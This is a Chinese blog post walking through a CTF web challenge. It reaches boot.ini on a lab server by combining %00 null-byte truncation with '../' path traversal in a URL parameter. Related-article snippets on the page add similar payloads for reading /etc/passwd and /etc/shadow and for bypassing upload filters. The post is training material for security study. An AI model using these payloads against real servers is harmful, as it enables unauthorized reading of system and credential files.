CTF---Web---文件包含---04---%00截断

最新推荐文章于 2024-10-23 23:59:23 发布
最新推荐文章于 2024-10-23 23:59:23 发布
阅读量535 收藏
点赞数
分类专栏: 刷题记录 CTF web 文章标签: CTF web 文件包含 hgzzk 刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22160557/article/details/119179903
版权
本文介绍了CTF中的一道Web文件包含题目,重点是利用%00截断技巧来获取flag。通过构造payload如`boot.ini%00`并结合路径匹配`.../.../.../.../`,成功从URL`http://172.16.15.192/stage/8/show.php?name=boot.ini%00&path=test/.../.../.../.../`中揭示了key——8DB4DDF1C46E764A。总结中强调了%00截断在GET和POST请求中的应用,并提供相关参考资料。
摘要由CSDN通过智能技术生成

文章目录

前言

题目分类:

CTF—Web—文件包含—04—%00截断

一、题目描述

题目: 文件包含—boot.ini

http://172.16.15.192/stage/8/show.php?name=says&path=test/
在这里插入图片描述

二、解题步骤

1、 构造payload

step1:修改name值,截断%00,还有路径匹配,即可爆出key:8DB4DDF1C46E764A

http://172.16.15.192/stage/8/show.php?name=boot.ini%00&path=test/…/…/…/…/
在这里插入图片描述

三、总结

1、%00截断,此题为get方式的截断,还有post传参,参考链接

2、…/…/…/…/为路径匹配,

最低0.47元/天 解锁文章
ygxzq520
关注
专栏目录
CTF---Web---文件包含---03---require_once
qq_22160557的博客
07-28 1966
文章目录前言一、题目描述二、解题步骤1、御剑扫描2、审计源代码3、构造payload4、查表名5、查列名6、查字段名总结 前言 题目分类: CTFWeb文件包含—03—require_once 一、题目描述 题目: b-11-未写完的网站 二、解题步骤 1、御剑扫描 Step1:用御剑扫描后,得到web.zip,为网站源代码。 2、审计源代码 Step2:题目逻辑: info.php页面中的role变量未经过addslashes过滤,经过将传入的$tem参数赋值为…/edit_info时,re
CTF---Web---文件包含---08---boot.ini
qq_22160557的博客
07-28 589
文章目录前言一、题目描述二、解题步骤1、 构造payload三、总结 前言 题目分类: CTFWeb文件包含—08—boot.ini 一、题目描述 题目: 欢迎贵客到访,寒舍乃使用Windows搭建,且看君如何获取进门宝匙。 链接:http://172.16.15.216/stage/11/show.php?file=says 提示:boot.ini 二、解题步骤 1、 构造payload 解题过程:三,四个…/与%00截断结合 …/为路径匹配,%00为目录截断 http://172.16.15.2
文件包含漏洞的 00截断
arissa666的博客
09-23 8736
isset()函数若变量不存在则返回 FALSE;若变量存在且其值为NULL,也返回 FALSE。若变量存在且值不为NULL,则返回 TURE。%00是被服务器解码为0x00发挥了截断作用。核心是chr(0)字符。
php包含截断小结.txt
07-24
php截断技术
CTF 00截断
luminous_you的博客
12-08 1691
PHP 5.2 00截断上传的原理 php解释器是C语言编写的 C语言中学过字符串的结尾会有00作为字符串结束的标志 在url中%00表示ascll码中的0 ,而ascii中0作为特殊字符保留,表示字符串结束,所以当url中出现%00时就会认为读取已结束 0x00,%00,/00之类的截断,都是一样的 hex编码修改 更改相应的字节 0x20->0x00【20是空格】 https://blog.csdn.net/qq_26090065/article/details/81458937 %00截断有两
CTF-Web5(00截断
→_→
08-19 1344
5.上传绕过 题目名字和提示都说的很明确,这题是一道上传绕过的题目,点开题目链接,可以看到一个文件上传的界面: 这里可以尝试随便上传一些文件,看看效果: 先尝试上传一个jpg文件: 上传jpg文件的提示为必须上传后缀名为php的文件才行,那么我们再上传一个php文件: 上传的结果是告诉我们仅支持jpg,gif,png后缀的文件。 仅支持上传jpg,gif,png后缀的文件,但是上传后又会提示必须上传后缀名为php的文件才行。 那么现在这个问题该怎么去解决呢,目前有一个思.
CTFHub | 00截断
尼泊罗河伯的博客
04-08 2042
分析网页源代码可以看到,这段代码检查是否有提交的文件,如果用户点击了 Submit 按钮,那么将获取到上传的文件名,将用户上传的文件名与白名单中的文件(jpg、png、gif)进行比较,并生一个相同扩展名的随机文件名称。
iwebsec靶场 文件包含漏洞通关笔记2-文件包含绕过(截断法)
mooyuan的博客
09-12 928
文件包含漏洞中,在服务器执行一个PHP文件时可以通过文件包含函数执行另一个文件,无论这个文件是不是PHP为其后缀,都可以当成PHP执行。文件上传的截断绕过通常源码包含如下字段,比如说传入的参数filename=phpinfo.txt,那么include时会为文件名加上 .html后缀,于是include的文件名就变为了phpinfo.txt.html,这样会导致文件包含漏洞利用出现失败。
CTF---Web---文件包含---09--etc/shadow
qq_22160557的博客
07-28 580
文章目录前言一、题目描述二、解题步骤1、 构造payload三、总结 前言 题目分类: CTFWeb文件包含—09–etc/shadow 一、题目描述 题目: 文件包含 链接:http://172.16.15.216/stage/12/ 二、解题步骤 1、 构造payload 读取linux的/etc/shadow文件,用#截断目录 http://172.16.15.216/stage/12/show.php?file=…/…/…/…/etc/shadow# 三、总结 1、/etc/shadow
CtfHub-wp(web
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
文件包含漏洞长度截断(3),2024年最新2024年是做网络安全开发人员的绝佳时机
2301_77116622的博客
04-16 344
当一个文件包含,后拼接了一个后缀时,都会在我们的伪协议后加上拼接的后缀,往往这个后缀就会导致我们访问失败,如何绕过?可以尝试00截断,也可以尝试我们接下来叙述的长度截断。
【复习】文件包含_02_截断
qq_45300786的博客
05-22 974
文件包含截断 1、00截断00字符截断(php<5.3.4) (需要 magic_quotes_gpc=off) /etc/passwd /etc/passwd%00 http://include.hahahaha.com/file02.php?file=x.jpg%00 2、超长文件截断 (php版本小于5.2.8 可以成功,linux需要文件名长于4096,windows需要长于256) 利用操作系统对目录最大长度限制。 在window下256字节 linux下4096字节 截断的字符有“.
PHP 文件包含之文件路径截断(转)
weixin_30730151的博客
07-23 298
PHP 文件包含之文件路径截断 以下是网络摘要: 1. 本来还以为挖到金矿了,跟黑哥交流后发现只能应用于Win32平台,使这个BUG的威力暴减,基本没有太大危害了,因为在WIN32平台使用PHP的实在太少了。 include $_GET[file].”.php”; 以前我们使用%00来截断,现在的PHP版本基本上已经失效了。挖掘思路是黑哥之前提到的结合多个环境下的条件,触...
CTFHub】文件上传漏洞_00截断
Mitchell_Donovan的博客
04-20 1527
文件上传_00截断 原题链接 key:PHP的%00截断 ①原题界面如下???? 直接上传.php文件显然不行,再尝试上传图片马还是不行 ②burpsuite抓包,放到repeater中???? go一下在回应报文里找到源码???? if (!empty($_POST['submit'])) { $name = basename($_FILES['file']['name']); $info = pathinfo($name); $ext = $inf
CTFHUB-文件上传-00截断
weixin_68416970的博客
08-02 226
CTFHUB技能树、文件上传漏洞、00截断的过关教程
CTFHUB技能树之文件上传——00截断
最新发布
weixin_73049307的博客
10-23 457
在upload/后面加上0500jieduan.php%00。直接指明是00截断方法绕过。
CTF学习笔记21:iwebsec-文件上传漏洞-06-文件截断上传
lvx++的博客
03-18 1282
一、通过burpsuite改扩展名等方法不能上传 二、用burpsuite配合%00上传 (一)在前缀框输入:6.php%00,如果为空则上传文件保存为"_随机数字+.jpg"的图片文件 (二)在filename处也加入%00.gif (三)在path段,选中%00右击,选择URL-decode,否则会将%00作为普通字符处理 (四)点击forward上传成功 (五)虽然提示路和文件名中包含随机数字和jpg,但实际上传的文件名仅为6.php 三、测试连接 测试连接成功 ...
CTF bugku never give up】关于URL/Base64解码、eregi()z截断、文件包含利用
zw05011的博客
01-14 441
转:https://ciphersaw.me/2017/12/26/【Bugku CTFWeb —— never give up/ 0x00 前言 此题为 Web 基础题,难度中低,需要的基础知识有:HTML、PHP、HTTP 协议。 首先考查发现源码的能力,其次重点考查 PHP 黑魔法的使用,相关链接如下: 0x01 拦截跳转 点开解题链接,除了一句 never never never give up !!! 之外空空如也,直接查看源码,发现一条注释中有线索: 根据提示打开链接:htt
php 文件包含 截断,【原创】WEB安全第五章 漏洞学习与利用06文件包含截断
weixin_30789475的博客
03-13 303
WEB安全第五章 漏洞学习与利用06文件包含截断1、00截断00字符截断(php<5.3.4)(需要 magic_quotes_gpc=off)/etc/passwd/etc/passwd%00http://include.moonteam.com/file02.php?file=x.jpg%0000字符截断(php<5.3.4)(需要 magic_quotes_gpc=off)/e...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值